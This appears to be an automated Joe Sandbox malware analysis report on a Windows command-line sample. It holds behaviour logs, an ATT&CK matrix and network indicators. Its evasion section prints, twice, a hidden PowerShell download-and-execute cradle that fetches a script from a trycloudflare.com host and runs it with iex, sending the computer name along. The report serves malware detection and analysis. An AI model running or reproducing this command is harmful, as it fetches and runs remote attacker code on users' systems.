    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4846Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4977Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -13835058055282155s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000003.00000002.1451599712.0000000007330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<o
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: amsi32_7524.amsi.csv, type: OTHER
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $sJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    11
    Process Injection
    31
    Virtualization/Sandbox Evasion
    OS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    11
    Process Injection
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Software Packing
    Security Account Manager31
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture13
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1603480 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 31/01/2025 Architecture: WINDOWS Score: 72 21 occasional-peterson-blast-sussex.trycloudflare.com 2->21 29 Malicious sample detected (through community Yara rule) 2->29 31 Yara detected Powershell decode and execute 2->31 33 Sigma detected: PowerShell Download and Execution Cradles 2->33 35 Sigma detected: Suspicious PowerShell IEX Execution Patterns 2->35 9 cmd.exe 1 2->9         started        signatures3 process4 process5 11 cmd.exe 1 9->11         started        13 conhost.exe 9->13         started        process6 15 powershell.exe 15 29 11->15         started        dnsIp7 23 occasional-peterson-blast-sussex.trycloudflare.com 104.16.231.132, 443, 49706 CLOUDFLARENETUS United States 15->23 25 Found suspicious powershell code related to unpacking or dynamic code loading 15->25 27 Loading BitLocker PowerShell Module 15->27 19 conhost.exe 15->19         started        signatures8 process9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls0%Avira URL Cloudsafe
    https://occasional-peterson-blast-sussex.trycloudflare.com0%Avira URL Cloudsafe

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    occasional-peterson-blast-sussex.trycloudflare.com
    104.16.231.132
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://occasional-peterson-blast-sussex.trycloudflare.com/cloudflstrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1441520965.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://crl.microsoftpowershell.exe, 00000003.00000002.1455365051.00000000083AD000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000003.00000002.1441520965.000000000551E000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/powershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://occasional-peterson-blast-sussex.trycloudflare.compowershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1441520965.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              104.16.231.132
                              occasional-peterson-blast-sussex.trycloudflare.comUnited States
                              13335CLOUDFLARENETUStrue
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1603480
                              Start date and time:2025-01-31 01:13:07 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 2m 7s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowscmdlinecookbook.jbs
